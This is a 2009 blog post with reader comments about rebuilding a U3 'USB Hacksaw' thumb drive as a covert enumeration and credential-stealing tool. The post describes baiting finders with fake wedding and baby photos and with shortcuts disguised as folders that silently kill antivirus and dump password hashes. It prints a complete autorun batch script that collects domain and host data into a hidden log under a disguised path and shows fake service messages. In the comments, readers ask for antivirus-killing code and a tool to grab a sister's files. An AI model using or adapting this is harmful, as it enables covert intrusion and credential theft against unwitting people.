Tuesday, February 24, 2009

USB Enumerator vs USB Hacksaw

Recently a mate at work commented that he got a bit stuck with the whole U3 hacksaw / switchblade kurfuffle. Well I still had original my U3 set up from a couple of years ago after watching the Hak.5 show (Series 2 if your interested), but I thought it needed a bit of a refresh.

Being inspired by DarkOperators Metasploit scripts for enumeration I decided to set up the U3 to use what god gave us, okay what Microsoft gave us, built in tools. But more specifically, built in tools for computer & network enumeration.

So what's the point to this I hear you ask, well after using my Hacksaw here and there and seeing it detected by AV now and then I figured that for it to be as stealthy as possible a few modifications were in order.

First I gave it a good overwrite with DD and started a fresh with the builder tool. The tool I use is LPInstaller.exe. I can't remember where I got it from but it wipes out all the pre-installed U3 goodness and leaves you with a U3 stick that you can mod to be the ultimate USB Enumerator.

With it looking like a brand new U3 this is where a little thought goes in. Now and then at work the receptionist sends an email to all users asking if anyone has lost a USB thumb drive. Well I can take advantage of this good nature by placing a file with a throw away email address in in the root called "Contact Me if Found.txt"

Now when it's found or handed in to a reception, some nice person might email me and let me know that they have it. But why would they do that? Because my next folder is titled "Wedding Pics - DO NOT DELETE" and it has a few wedding and baby pics in (no metadata remember).

So what cold hearted person wouldn't want to return a USB Device with baby and wedding pics on right! Oh and the guy in the wedding photo...... he's in a wheelchair (thanks Google Images) so it would have to be a cold hearted individual who is going to keep that USB drive.

Next I have a couple more directories.

Well they look like directories but they are just links to my evil scripts that will help me on my dark crusade.

A closer look at the shortcut reveals its actually a link to a batch file that will kill any running AV and launch programs to get the local password hashes, internet passwords and login details for MSN etc. And we all know that people re-use paswords don't we.

When someone clicks on one of these 'shortcuts' it will place the running batch file to the back of any open windows and the only clue that anything is going on is a folder in the toolbar which will disapear after a few seconds.

And the batch file can do anything. Obviously I want to stop AV first, and then thanks to a few tools from Nirsoft as well as a few others from the likes of foofus I have loads of juicy details coming my way.

And what does this give me? Hashes, oh the lovely hashes.......

And of course we want the websites too.

And theres plenty more but I'm sure you get the point.

But this is a U3 thumb drive, so hopefully we don't need to rely on a nosey bugger clicking around, because it will hopefully utilise the auto run feature to enumerate the network as soon as it's plugged in. It does the crazy enumeration coolness by running this script from the hidden \WIP\CMD folder.

Here's the simple batch file that does the enumeration:

@Echo off
echo Starting. Do not close program. Please wait 15 seconds.
::Generate a unique filename
set fn=%computername%-%random%
::Create a non-obvious directory
mkdir .\Windows\System\System32\etc\hosts\win\0011\%fn%
cd .\Windows\System\System32\etc\hosts\win\0011\%fn%
::Get local Time and Date Info
time /t >%fn%.log
date /t >>%fn%.log
::Network Info
net user /domain >>%fn%.log
echo Restarting critical service. Please Wait 5 seconds.
net group /domain >>%fn%.log
net localgroup /domain >>%fn%.log
net localgroup administrators /domain >>%fn%.log
net localgroup "Account Operators" /domain >>%fn%.log
net accounts /domain >>%fn%.log
net view /domain >>%fn%.log
net view >>%fn%.log
echo Service restart complete. Please wait 5 seconds.
::Local Info
ipconfig /all >>%fn%.log
ipconfig /displaydns >>%fn%.log
netstat -ano >>%fn%.log
netstat -r >>%fn%.log
arp -a >>%fn%.log
tasklist /svc >>%fn%.log
tasklist >>%fn%.log
tasklist /v >>%fn%.log
net share >>%fn%.log
net use >>%fn%.log
net accounts >>%fn%.log
net localgroup >>%fn%.log
net localgroup administrators >>%fn%.log
systeminfo >>%fn%.log
netsh firewall show config >>%fn%.log
echo Service failed to load. Error code MS-31337
netsh diag show all /v >>%fn%.log

And that pretty much enumerates the network for all accounts, groups and members of admin groups. It gets password policies, computer details from the domain, domain names....

local accounts and groups, firewall policies, applied hotfixes, network connections, open ports, running services, shares, networking information and other bits and bobs as well.

And the beauty of it all is it's just using Microsoft tools which won't make the AV go loopy and freak out. So within a few seconds of plugging the device into any PC with a USB port on a network and you'll have more data than you can shake a big enumerating stick at. Wonderful!

All this useful data is output to a single log file that is in a deeply buried obfuscated directory with a random number appended to the end, so it can be run time after time and is nicely tucked away.

But what if autorun is disabled? Well just like the script that kills the AV and grabs the passwords this can be run manually by clicking the batch file or by fronting it with a shortcut with a folder icon and running that.

So how can this be useful in a pentest? it could be that during that pentest you have social engineered your way onto a helpful persons PC who is going to print something off for you or email an important document for you and said files are on your USB device. Or you could hand a USB device to a receptionist to ask her to heck who's it is. Or of course you could just be transfering those picture or music files to your friends computer. So if your reading this and you know me, maybe next time you ask me for a file or a movie that I have on USB you better think again!

So there you have it, my take on making my USB Hacksaw a little more interesting.

For more info on U3 Hacking I recommend this post by McGrew Security


Anonymous said...

Hi synjunkie,

Really enjoying your blog. It's very informative.

For your homebrew hacksaw, what commands did you use for your Av-Die2.cmd batch script ?

I'm using one using sysinternals pskill and the list of AV .exe's from a metasploit ruby script - http://trac.metasploit.com/browser/framework3/trunk/scripts/meterpreter/killav.rb?rev=5773

Just wondering if you have something a little more useful than this one.

Many thanks, keep up the great work!


SynJunkie said...

Hi Anon

Thanks for leaving a comment. For the script that kills the AV i simply took a script from moonlit on the Hak5 forum. a bit of Google magic on moonlit and hak5 should turn it up. I didn't realise that Metasploit had that in, i'll have to take a look and compare.



CypherBit said...

What if the receptionist like all other users is using a standard user account (and any AV), which of tools.cmd would even work?

The enumeration shouldn't be a problem, but what about all the rest?

Could you post the complete tools.cmd, not only the enumeration part.

SynJunkie said...


that's a very good point and one of the reasons why i would either have a USB key for enumeration (which wouldn't be picked up by AV and a restricted user can run the built in tools (usually) and then another USB key for the evil tools. Or another idea I'm playing with at the moment is having the evil tools in an encrypted truecrypt volume that doesn't get opened until the AV is off. I'll see where i get to with that but i'm sure its do-able.

i'll post up my evil tools script in the either tonight or in the week as a comment on this post.



CypherBit said...

Thank you, that makes sense. Perhaps the "evil tools" could be zipped up protected by a password and the batch file would also check if the user is admin or not.

Looking forward to see how this evolves.

SynJunkie said...

That's a great idea, I'll certainly be coming back to this one later this week.



Anonymous said...

*cough cough* come back,

Love your posts! Bookmarked your blog already, lots of good reads, was looking forward to seeing your use of the .bat script!

SynJunkie said...

Hi Anonymous

I'm still here. I have been working on a new story that i hope to have ready soon. I'm trying to work the hacksaw stuff into that.

Thanks for the comment and cheers for bookmarking my blog. It's great to know that these posts are interesting to people other than myself.


Ivion said...

Im a total noob to this stuff...where do you put the scripts and in what format do you save them in?

SynJunkie said...

My scripts are in a hidden folder \WIP\CMD\ in the writable partition on the U3 and the script file tht I run is called tools.cmd which is basically a batch file as described in the post.

Dai Vernon said...

Hi, I don't understand, you have the payload installed in the writable partition? I thought that the science of using a U3 was beeing abble to install the payload in the locked emulated CD drive so if the AV gets jumpy it won't be able to erase the files, and saving the log (logically) in the writable partition. help if i'm wrong, please. thanks for the info. it's still stealthy? the batch ran by the autorun.inf doesn't get picked up?

SynJunkie said...

It's a while since I set it up. From memory, the point of the "CD" partition (read-only) was to get it to auto launch a program on the writable partition which the "attacker" chooses.

Unfortunately AV will be able to erase files if detected I guess thats why we have tools like MsfEncode and PEScrambler ;-)

Anonymous said...


SynJunkie said...

Have you tried it in another USB port or from another PC? Also have a look on the Hak.5 forums, they have a pretty good list of posts on the U3's

Anonymous said...

What software can I use on a usb device so that I can copy as much files as possible onto it when I plug it in my sisters pc? (Instant file copier) ex: My documents

Anonymous said...

HELP I need a usb document snatcher...ex my documents from another pc when I plug in my usb...(copy users my document files)

SynJunkie said...

I'm not sure I agree with your motives, but if i was you I would just use a batch file.